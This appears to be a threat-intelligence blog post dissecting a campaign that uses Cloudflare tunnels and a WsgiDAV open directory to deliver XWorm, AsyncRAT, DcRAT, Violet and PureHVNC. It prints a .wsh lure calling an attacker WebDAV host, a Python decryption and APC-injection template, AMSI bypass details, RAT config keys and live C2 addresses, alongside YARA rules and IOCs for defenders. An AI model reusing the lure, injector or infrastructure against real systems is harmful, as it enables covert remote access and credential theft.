Five RATs, One Tunnel: Dissecting a Multi-Family Malware Campaign Abusing Cloudflare and WsgiDAV

Published: 2026-03-08 Author: breakglass.intelligence Tags: RAT, Cloudflare Tunnel, Donut, XWorm, AsyncRAT, DcRAT, Violet, PureHVNC, Open Directory

---

TL;DR

A threat actor is operating a multi-stage malware delivery chain across four coordinated Cloudflare Tunnels backed by a WsgiDAV open directory. The campaign delivers five distinct RAT families — XWorm, AsyncRAT, DcRAT, Violet, and PureHVNC — via Donut-packed shellcode injected into explorer.exe. All C2 infrastructure converges on two IPs in the same AT&T /24 subnet, confirming a single operator running simultaneous RAT listeners targeting the United Kingdom.

---

Campaign Overview

On March 5, 2026, we identified an actively-serving WsgiDAV 4.3.0 open directory behind a Cloudflare Tunnel at fuji-layout-exterior-bunch.trycloudflare[.]com. What initially appeared to be a single-family RAT distribution turned out to be a coordinated multi-tunnel, multi-family operation with a build pipeline generating uniquely-encrypted variants on a monthly cadence.

The attack chain spans seven stages, moving from a .wsh lure masquerading as a scanned PDF through JScript loaders, batch downloaders, Python-based shellcode injectors, Donut framework shellcode, and finally five .NET RAT payloads executing entirely in memory.

Stage 1: .wsh lure (Scan_0630274892048.pdf.wsh)
  | WebDAV UNC path
Stage 2: .wsf JScript loader (ukmar03.wsf)
  | WebDAV file copy
Stage 3a: .bat downloader (UKM031.txt -> .bat)
  | curl from 4th tunnel
Stage 3b: .bat executor (UKM032.txt -> .bat)
  | extracts ZIPs, runs Python
Stage 4: ZIP payloads (1Feb02MA.zip, 1Feb02ST.zip)
  | Python 3.12 x64 + PyCryptodome
Stage 5: Python shellcode injectors (9 scripts)
  | AES-CBC + double-XOR decryption
Stage 6: Donut shellcode -> explorer.exe injection
  | Chaskey-LTS CTR decryption, AMSI bypass
Stage 7: .NET RAT payloads (XWorm, AsyncRAT, DcRAT, Violet, PureHVNC)

---

Infrastructure: Four Tunnels, One Machine

The actor operates four active Cloudflare Tunnels, each serving a specific stage of the delivery chain:

Tunnel	Role	Display Name
fuji-layout-exterior-bunch[.]trycloudflare[.]com	Stage 1 — .wsh lure hosting	M03UKLK
dialogue-pool-cookie-mini[.]trycloudflare[.]com	Stage 2 — .wsf loader hosting	M03UKWF
stickers-gentleman-queen-dreams[.]trycloudflare[.]com	Stage 3 — .bat downloaders	M02UKBT
empire-judge-delhi-finest[.]trycloudflare[.]com	Stage 4 — ZIP payloads	M02UKZP

A fifth tunnel (statutes-scripts-friendship-switch[.]trycloudflare[.]com) was referenced in a January 2026 variant but is now dead.

All four active tunnels report identical quota-used-bytes: 27964350464 in their HTTP headers, confirming they run on the same underlying machine. The display names follow a clear naming convention: M[month][year]UK[type] — where UK indicates the target geography (United Kingdom) and the suffix encodes the payload type (LK=link, WF=WSF, BT=batch, ZP=zip).

The WsgiDAV server itself runs anonymously with no authentication — full read-write access over WebDAV:

Server: WsgiDAV/4.3.0 CPython/3.12.6
Backend: cheroot/10.0.1
Access: Anonymous (no authentication)

---

Stage 1-3: From Lure to Loader

The .wsh Lure

The initial access vector is a Windows Script Host shortcut file disguised as a scanned PDF (Scan_0630274892048.pdf.wsh, 128 bytes). When executed, it reaches out via WebDAV to the second tunnel:

[ScriptFile]
Path=\\dialogue-pool-cookie-mini.trycloudflare.com@SSL\DavWWWRoot\et\ukmar03.wsf

[Options]
UseEngine=JScript

JScript Loader

The .wsf loader (ukmar03.wsf, 666 bytes) copies two batch files from the third tunnel to %USERPROFILE%\Contacts\, renames them from .txt to .bat, and executes them with a 90-second delay between stages. The .txt extension on the tunnel avoids content-type filtering; the rename to .bat happens locally.

Batch Downloaders

Two batch scripts handle payload retrieval and execution:

UKM031.bat (downloader) — Uses curl to pull from the fourth tunnel:

• 1Feb02MA.zip extracts to %USERPROFILE%\Contacts\MainRingtones (main payload)
• 1Feb02ST.zip extracts to %USERPROFILE%\Contacts\str (secondary/redundant payload)
• 1Feb02SU.txt drops to the Startup folder for persistence

UKM032.bat (executor) — Runs the Python injectors, then cleans up:

• Executes python.exe *.py from MainRingtones\Python312x64\
• Creates py_parent.vbs — a WMI script that kills python.exe processes that are parents of explorer.exe (cleaning up after PPID spoofing)
• Hides payload folders with attrib +h
• Deletes all .bat files from the Contacts folder

This is noteworthy: the actor ships a full Python 3.12 distribution bundled with PyCryptodome inside the ZIP payload. Using python.exe as the injector process is a deliberate evasion choice — it is a legitimate, signed Microsoft binary that will not trigger most application whitelisting or EDR heuristics on its own.

---

Stage 5: Python Shellcode Injectors

Each ZIP contains multiple Python scripts, each delivering a different RAT family. The main payload (1Feb02MA.zip, 14.2 MB) contains five scripts; the secondary (1Feb02ST.zip, 14.1 MB) contains four overlapping variants with SA/S prefixes — providing redundancy if the main payload is detected.

Script Pattern	RAT Family	Shellcode Size
1Xwrmmmm...Mar05.py	XWorm V3.1	73,474 bytes
1annnnn...Mar05.py	DcRAT (Infected-Anarchy)	103,170 bytes
1assss...Mar05.py	AsyncRAT	84,738 bytes
1hvvvv...Mar05.py	PureHVNC (Ygfumkl)	369,922 bytes
1UKviooo...Mar05.py	Violet v5	101,634 bytes

All nine scripts use identical injection code:

# Decryption: AES-256-CBC + double XOR (per-sample keys)
cipher = AES.new(aes_key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(ciphertext)
for i in range(len(decrypted)):
    decrypted[i] ^= xor_key_1[i % len(xor_key_1)]
    decrypted[i] ^= xor_key_2[i % len(xor_key_2)]

# Injection: APC injection into suspended explorer.exe
hProcess = CreateProcessA("explorer.exe", ..., CREATE_SUSPENDED)
addr = VirtualAllocEx(hProcess, ..., MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
WriteProcessMemory(hProcess, addr, shellcode, len(shellcode))
QueueUserAPC(addr, hThread, 0)
ResumeThread(hThread)

Each sample uses unique AES keys, IVs, and XOR keys — the build pipeline generates fresh cryptographic material per variant while reusing the injection template.

---

Stage 6: Donut Shellcode Framework

All nine injectors produce Donut framework shellcode that loads .NET assemblies entirely in memory. During analysis we identified a non-standard implementation detail that breaks most public Donut decryptors.

Donut Configuration

• Cipher: Chaskey-LTS (16 rounds) in CTR mode
• Instance header: 0x230 bytes, encrypted with master key at blob[4:20], nonce at blob[20:36]
• AMSI bypass: Patches AmsiInitialize, AmsiScanBuffer, AmsiScanString
• WLDP bypass: Patches WldpQueryDynamicCodeTrust, WldpIsClassInApprovedList
• CLR hosting: Loads mscoree.dll to host .NET runtime, calls Assembly.Load() for fileless execution
• Module type: 4 (EXE) — all payloads are .NET PE32 executables

Non-Standard CTR Counter

The CTR counter increments from byte 15 down to byte 0 (big-endian 128-bit increment), not the standard little-endian uint32/uint64 increment most analysis tools assume. This was confirmed by disassembling the counter increment loop at shellcode offset 0x100cf. If you are writing a Donut decryptor and getting garbage output, this is likely why.

---

Stage 7: The RAT Payload Arsenal

XWorm V3.1

Field	Value
SHA256	ed4fb8fe...edb85145dc
Assembly	XClient3-01-15.exe (.NET 4.0, 41,256 bytes)
C2	hy647dhon.duckdns[.]org:8292
Auth Key	<123456789>, Delimiter: <Xwormmm>
Mutex	lOyuApQB7sBGSt3o

Config encryption uses AES-256-ECB with a key derived from MD5(Mutex) — notably, it uses the Mutex field, not the KEY field. The MD5 hash is copied to bytes [0:16] and [15:31] to form the 32-byte AES key.

Capabilities include DDoS, keylogging, screen capture, a plugin system, browser credential recovery, USB worm spreading (USB.exe), UAC bypass, ngrok tunneling, and 24+ command handlers.

AsyncRAT 0.5.7B

Field	Value
SHA256	4bb4a303...e9ef746181aa29
Assembly	AsyncClient.exe (.NET 4.0, 52,520 bytes)
C2	uejrhnfq.duckdns[.]org:6745
Mutex	AsyncMutex_6SI8OkPnk
Install	false (fileless)

Config encryption uses AES-256-CBC with PBKDF2-HMAC-SHA1 (50,000 iterations):

Key:  Ff6VygGEmXLxZ17uU1fqBwyv7Not5Jtw
Salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Wire format: [HMAC-SHA256(32)] [IV(16)] [AES-CBC ciphertext]

The server certificate (CN=AsyncRAT Server, RSA 4096-bit, SHA-512, valid 2024-05-25 to 9999-12-31) was confirmed live on port 6745 using TLSv1.0 with ECDHE-RSA-AES256-SHA — an outdated TLS version that serves as a strong network detection indicator.

Anti-analysis features include VMware/VirtualBox/Sandboxie detection (SbieDll.dll check) and CheckRemoteDebuggerPresent. The registry persistence path is stored reversed: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS.

DcRAT / Infected-Anarchy

Field	Value
SHA256	58d9f039...cb44917d4a5c75af
Assembly	Infected-Anarchy-15-01.exe (.NET 4.5, 70,952 bytes)
C2	y57kdsa.duckdns[.]org:7878
Attribution	DcRatByqwqdanchun

This is a modified AsyncRAT fork by qwqdanchun with significant enhancements:

• AMSI bypass: Runtime patching of AmsiScanBuffer in amsi.dll
• ETW bypass: Runtime patching of EtwEventWrite
• NtProtectVirtualMemory unhooking + D/Invoke dynamic API resolution
• Anti-analysis process killing: Terminates Taskmgr.exe, ProcessHacker.exe, procexp.exe, MsMpEng.exe, MpCmdRun.exe, NisSrv.exe, Regedit.exe, taskkill.exe, and more
• Camera/microphone access via DirectShow GUIDs
• UAC bypass via mscfile/ms-settings fodhelper

The server certificate is particularly revealing: CN=DcRat, Issuer: C=CN, L=SH, O=DcRat By qwqdanchun, OU=qwqdanchun, CN=EBOLA — RSA 1024-bit (weaker than the AsyncRAT cert), valid 2023-09-07 to 2034-06-16.

Violet v5

Field	Value
SHA256	4b6d47e0...2d8e0d226981eba
Size	69,416 bytes
C2	volvogroup20.duckdns[.]org:2120
Delimiter	<Violet>, Mutex: XSRSXSX

Config encryption uses double-base64 encoding plus XOR with a repeating key AGZOVok (7 bytes) hardcoded inside the decrypt function — the Settings class stores E8R1a8yU1baxo8ok separately as the C2 authentication key.

Violet brings capabilities the other RATs lack: a clipper (clipboard hijacking for cryptocurrency theft), a bot-killer (eliminating competing malware), and a fake update screen to mask malicious activity. It also includes ngrok tunneling for RDP, credential stealing, network discovery, and an HTTP DDoS module with spoofed User-Agent headers and fake POST payloads (Content-length: 5235).

The volvogroup20 DuckDNS subdomain may indicate social engineering targeting Volvo Group or an attempt to impersonate their infrastructure.

Persistence artifacts:

3d847c5c-4f5a-4918-9e07-a96cea49048d.exe
89c43fcf-5e52-4be7-a719-a26139ce636a.exe
WinSc32.exe
WinTempClean32.bat

PureHVNC via Ygfumkl Packer

Field	Value
SHA256 (packer)	f56a53ec...c50067f2a
Packer assembly	Ygfumkl.exe (337,704 bytes)
Inner payload	Lhjknyy.dll (788,480 bytes)
C2	12.202.180.133:6757 (confirmed via infrastructure correlation)

This is the most heavily protected payload in the campaign, using triple-layer protection:

1. Donut shellcode (Chaskey-LTS encryption, AMSI/WLDP bypass)
2. Ygfumkl AES packer (AES-256-CBC decryption + GZip decompression + reflective loading)
3. ConfuserEx (runtime IL generation, proxy delegate pattern)

The packer's execution flow:

Main -> MoveDriver -> Yntjen (AES decrypt 311,904-byte blob)
  Key: e045928c7f43069d4887ab8aeffa9d81a073dfd69c4ee38c8e27e15f63f1f80c
  IV:  7b8b83514851470a22d5ff0a2201a100
-> Uuuqsgnerjy (GZip decompress)
-> Assembly.Load -> InvokeMember("ManageSegmentedDic")

The inner payload is PureHVNC — a hidden VNC RAT that provides stealthy remote desktop access without the victim's awareness. It uses protobuf-based C2 communication, process hollowing via dynamically-resolved kernel32 APIs (strings split to evade static detection), and AES-encrypted C2 traffic with X.509 TLS validation.

ConfuserEx protection makes static config extraction intractable — each config field is split into separate single-field proxy classes (ProxyEncryptor, ProxyField, ProxyIterator) with key material derived through obfuscated integer constants and bit manipulation at runtime.

The C2 was identified through infrastructure correlation: port scanning the shared C2 IP 12.202.180.133 revealed port 6757 with a TLS certificate (CN=Zwfweayg) matching the same cipher suite and key parameters as the AsyncRAT listener on the same host.

---

C2 Infrastructure Analysis

All five RATs use DuckDNS dynamic DNS for C2 resolution, converging on two IPs in the same AT&T /24 subnet:

RAT	C2 Domain	Port	IP	Status
XWorm V3.1	hy647dhon[.]duckdns[.]org	8292	12.202.180.133	Filtered
AsyncRAT	uejrhnfq[.]duckdns[.]org	6745	12.202.180.133	Live
DcRAT	y57kdsa[.]duckdns[.]org	7878	12.202.180.133	Filtered
PureHVNC	(infra correlation)	6757	12.202.180.133	Live
Violet v5	volvogroup20[.]duckdns[.]org	2120	12.202.180.105	Live

Both IPs sit on AT&T infrastructure (AS7018). The .133 host runs three RAT listeners; the .105 host runs one. The proximity within a single /24 strongly suggests a compromised AT&T business customer or a residential connection with multiple static IPs.

C2 Protocol Emulation Results

We developed full protocol emulators for all three live C2 services. Key findings:

AsyncRAT (port 6745): Our emulator successfully derived the correct AES-256 key via PBKDF2 (50,000 iterations), constructed a valid encrypted ClientInfo packet, and maintained a connection for 3 minutes with Pong keepalives every 30 seconds. The server accepted our TLS handshake and encrypted packets silently but never responded — likely requiring ServerSignature verification or additional validation beyond what static analysis reveals.

Violet v5 (port 2120): The server uses plain TCP (no TLS). We discovered through extensive testing that the protocol is text-based, not binary length-prefixed as initially assumed — the server sends TCP RST on any packet containing null bytes. Registration requires a 23-field array joined by the <Violet> delimiter, XOR-encrypted with key AGZOVok. The server strictly validated and rejected all emulated registrations.

PureHVNC (port 6757): ConfuserEx protection blocked static extraction of the protobuf schema. Length-prefixed protobuf was the only format the server actively rejected (immediate CLOSE vs timeout on other formats), suggesting it recognized the framing but rejected the message content.

All three C2 servers implement strict client validation that prevents bot enumeration or command extraction without sandbox execution of the actual malware.

---

Campaign Timeline and Evolution

Date	Event
2025-09	Sep01x86_Ayoo.zip created (earliest artifact on open directory)
2025-11-28	Sep01x86_Ayoo.zip last modified
2026-01-16	1ukj16.wsf variant active, references now-dead tunnel
2026-02	UKM02* batch scripts created (M02 = February)
2026-03-05	Current campaign active (M03 = March, "Mar05" in Python filenames)

The naming convention M[month][year]UK[type] and the monthly tunnel rotation indicate an organized, iterative build process. Cross-campaign file reuse (UKM021.txt = UKM031.txt = UKM051.txt) shows the actor updates lure infrastructure monthly while keeping the core delivery mechanism stable.

---

Persistence Mechanisms

The campaign implements layered persistence:

1. Startup folder batch scripts — launch Python injectors on boot from four different paths
2. Scheduled tasks — schtasks /sc onlogon /rl highest (AsyncRAT, DcRAT)
3. Registry Run keys — Software\Microsoft\Windows\CurrentVersion\Run\ (AsyncRAT, DcRAT, Violet)
4. WMI helper scripts — py_parent.vbs / DiscordDial.vbs for process cleanup after injection

The startup script launches Python from four locations, including an %APPDATA%\Winic\30.3.0rc50\Python312x32 path that uses a different injection mode — killing explorer.exe and nslookup.exe parent processes rather than just Python parents. This suggests the x86 variant may inject into different target processes.

---

MITRE ATT&CK Mapping

Technique	ID	Implementation
User Execution: Malicious File	T1204.002	.wsh masquerading as PDF
Command and Scripting: JScript	T1059.007	.wsf with ActiveXObject
Command and Scripting: Windows Command Shell	T1059.003	.bat downloaders/executors
Command and Scripting: Python	T1059.006	Python shellcode injectors
Ingress Tool Transfer	T1105	curl download of ZIP payloads
Process Injection: APC Injection	T1055.004	QueueUserAPC into suspended explorer.exe
Process Injection: Process Hollowing	T1055.012	PureHVNC via VirtualAlloc/WriteProcessMemory
Obfuscated Files: Software Packing	T1027.002	Donut shellcode packer
Obfuscated Files: Encrypted/Encoded File	T1027.013	AES-CBC + XOR + base64 layers
Reflective Code Loading	T1620	Assembly.Load() .NET reflection
Boot/Logon Autostart: Startup Folder	T1547.001	Startup batch scripts
Scheduled Task/Job	T1053.005	schtasks /sc onlogon
Modify Registry	T1112	Run key persistence
Impair Defenses: Disable or Modify Tools	T1562.001	AMSI/ETW/WLDP bypass, Defender process killing
Virtualization/Sandbox Evasion	T1497.001	VMware/VirtualBox/Sandboxie detection
Hidden Files and Directories	T1564.001	attrib +h on payload directories
Dynamic Resolution: DNS	T1568.002	DuckDNS dynamic DNS for all C2
Encrypted Channel: Asymmetric Crypto	T1573.002	AsyncRAT TLS with self-signed RSA-4096
Non-Standard Port	T1571	C2 on ports 2120, 6745, 6757, 7878, 8292
Remote Services: VNC	T1021.005	PureHVNC hidden VNC
Clipboard Data	T1115	Violet clipper
Input Capture: Keylogging	T1056.001	XWorm, Violet keyloggers

---

Detection Opportunities

Network Signatures

TLS certificate fingerprinting is the highest-confidence detection for this campaign:

# AsyncRAT C2 certificate
SHA256: 2b72190cc9dca7d06ab6190cf16be8ad28ad8d1d5d60f96ae5984e1bf4bfb44b
CN:     AsyncRAT Server
Serial: A4:06:7A:DE:36:62:16:46:C1:7E:66:DA:15:4B:77

# PureHVNC C2 certificate
SHA256: 834efbdd063bba262d8f2c4a7ee7b0907f090f9f9d5424999ecae0d305a24b77
CN:     Zwfweayg
Serial: 90:B9:FF:33:2A:AE:E6:3F:72:D6:7A:29:3F:6C:65

# DcRAT C2 certificate
CN:     DcRat
Issuer: C=CN, L=SH, O=DcRat By qwqdanchun, OU=qwqdanchun, CN=EBOLA

Additional network indicators:

• TLSv1.0 connections to non-standard ports (6745, 6757) — modern software uses TLSv1.2+
• DNS queries for *.duckdns.org subdomains: hy647dhon, uejrhnfq, y57kdsa, volvogroup20
• TCP traffic containing <Violet> delimiter (port 2120, plaintext)
• TCP traffic containing <Xwormmm> field separator (XWorm)

Host Signatures

# Mutex names
lOyuApQB7sBGSt3o          (XWorm)
AsyncMutex_6SI8OkPnk       (AsyncRAT)
XSRSXSX                    (Violet)

# File paths
%USERPROFILE%\Contacts\MainRingtones\Python312x64\
%USERPROFILE%\Contacts\str\python312x64\
%APPDATA%\Winic\30.3.0rc50\Python312x32\

# WMI helper scripts
py_parent.vbs
DiscordDial.vbs

# Violet persistence
3d847c5c-4f5a-4918-9e07-a96cea49048d.exe
89c43fcf-5e52-4be7-a719-a26139ce636a.exe
WinSc32.exe

# PureHVNC packer indicators
Assembly: Ygfumkl.exe
Entry type: Lhjknyy.Collections.DicProfiler
Namespaces: PureHVNC_Lib.*, Lhjknyy.*

YARA Rules

rule CloudflareMultiRAT_AsyncRAT_TLS_Cert {
    meta:
        description = "AsyncRAT C2 server TLS certificate - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $serial = { A4 06 7A DE 36 62 16 46 C1 7E 66 DA 15 4B 77 }
        $cn = "AsyncRAT Server"
    condition:
        any of them
}

rule CloudflareMultiRAT_PureHVNC_Ygfumkl {
    meta:
        description = "Ygfumkl .NET packer delivering PureHVNC - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $ns1 = "Lhjknyy.Collections.DicProfiler" ascii wide
        $ns2 = "ManageSegmentedDic" ascii wide
        $ns3 = "PureHVNC_Lib" ascii wide
        $aes_iv = { 7b 8b 83 51 48 51 47 0a 22 d5 ff 0a 22 01 a1 00 }
        $entry = "Ygfumkl" ascii wide
    condition:
        uint16(0) == 0x5A4D and (2 of ($ns*) or $aes_iv or ($entry and any of ($ns*)))
}

rule CloudflareMultiRAT_PureHVNC_TLS_Cert {
    meta:
        description = "PureHVNC C2 server TLS certificate - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $serial = { 90 B9 FF 33 2A AE E6 3F 72 D6 7A 29 3F 6C 65 }
        $cn = "Zwfweayg"
    condition:
        any of them
}

rule CloudflareMultiRAT_Python_Injector {
    meta:
        description = "Python shellcode injector pattern - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $api1 = "QueueUserAPC" ascii
        $api2 = "VirtualAllocEx" ascii
        $api3 = "WriteProcessMemory" ascii
        $api4 = "CreateProcessA" ascii
        $crypto1 = "AES" ascii
        $crypto2 = "MODE_CBC" ascii
        $target = "explorer.exe" ascii
        $flag = "CREATE_SUSPENDED" ascii
    condition:
        filesize < 600KB and
        all of ($api*) and any of ($crypto*) and $target and $flag
}

---

IOCs

File Hashes (SHA256)

Delivery Chain:

5decf89552e3949e15541cdbfa702c8c6f38445090785f07e27707a6dc97bdda  Scan_0630274892048.pdf.wsh
1039af45187af5b8460b8db86f4ebf67a6fd5c232c404eac061382bb7d4863f4  ukmar03.wsf
6c8cc3088a9f3f4d2d4ae123297b81d8ab86893cfad1bb992b5b0111eb2d7e21  1ukj16.wsf (older variant)
ab8a945511cf438b2cb6093671258f1216ae01800d4afad8befe98a65e66c22b  UKM031.txt
218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c  UKM032.txt
9d879a24e8e8206114f579e5ef89766c84cea43798b7a3c9fb0b56e3f2944736  1Feb02SU.txt
832326f3a377973a35cb465bd3510f5f6199c7454a0e0557e4f95b85313a76a5  1Feb02SU.bat
268d9d9f3a7276af4c49884181658136c7a9c7ed9e990971d01bd2b21d92b7b3  1Feb02MA.zip
2183d3dcbcf10fea76dd3ad74d6712417ec6be905b21a694c42fca89bd5b4ff7  1Feb02ST.zip

Extracted .NET RAT Payloads:

ed4fb8fe1d29aa1a604f0b910614688ad79816c98a9a46c07a2538edb85145dc  XWorm V3.1
4bb4a303b8e4873401be1cea68d50bdaa454471685dc30ad61e9ef746181aa29  AsyncRAT
58d9f039ec38bbe03a1e1bf58a0102ce9c94d6efe39d2450cb44917d4a5c75af  DcRAT/Infected-Anarchy
4b6d47e03be3db8645c1de5c16d1ceba94acf2588ce9b4ede2d8e0d226981eba  Violet v5
f56a53ec6817c918d9a0056277022d694a06727bc9064bee95e4b80c50067f2a  PureHVNC/Ygfumkl packer
59079dbdfb0346deae4efc361d78844141bf77d916adec96b23d8061e20e123c  PureHVNC inner (Lhjknyy.dll)

Network IOCs

Cloudflare Tunnels:

fuji-layout-exterior-bunch[.]trycloudflare[.]com
dialogue-pool-cookie-mini[.]trycloudflare[.]com
stickers-gentleman-queen-dreams[.]trycloudflare[.]com
empire-judge-delhi-finest[.]trycloudflare[.]com
statutes-scripts-friendship-switch[.]trycloudflare[.]com  (dead)

C2 Domains:

hy647dhon[.]duckdns[.]org:8292       (XWorm)
uejrhnfq[.]duckdns[.]org:6745       (AsyncRAT)
y57kdsa[.]duckdns[.]org:7878         (DcRAT)
volvogroup20[.]duckdns[.]org:2120    (Violet v5)

C2 IPs:

12.202.180.133  (AT&T AS7018 — AsyncRAT:6745, PureHVNC:6757, DcRAT:7878, XWorm:8292)
12.202.180.105  (AT&T AS7018 — Violet:2120)

Encryption Keys

# XWorm
AES key derivation: MD5("lOyuApQB7sBGSt3o") = c08a658232fb2e0a990d0720e656c8e8
Auth key: <123456789>
Delimiter: <Xwormmm>

# AsyncRAT
PBKDF2 key: Ff6VygGEmXLxZ17uU1fqBwyv7Not5Jtw
PBKDF2 salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Iterations: 50,000 (HMAC-SHA1)

# DcRAT
PBKDF2 key: EqobtaJh1ra1l2Px0fjvG8Ircxdf2e2P
PBKDF2 salt: DcRatByqwqdanchun (UTF-8)
Iterations: 50,000 (HMAC-SHA1)

# Violet v5
XOR decrypt key: AGZOVok (7 bytes, hardcoded in decrypt function)
Auth key: E8R1a8yU1baxo8ok
Delimiter: <Violet>
Mutex: XSRSXSX

# PureHVNC/Ygfumkl packer
AES-256-CBC key: e045928c7f43069d4887ab8aeffa9d81a073dfd69c4ee38c8e27e15f63f1f80c
AES-256-CBC IV:  7b8b83514851470a22d5ff0a2201a100

---

This investigation was conducted by breakglass.intelligence on 2026-03-05. IOCs are provided for defensive purposes. If you observe this infrastructure in your environment, the actor likely has full remote access including hidden VNC, keylogging, clipboard hijacking, and credential theft capabilities deployed simultaneously across multiple RAT families.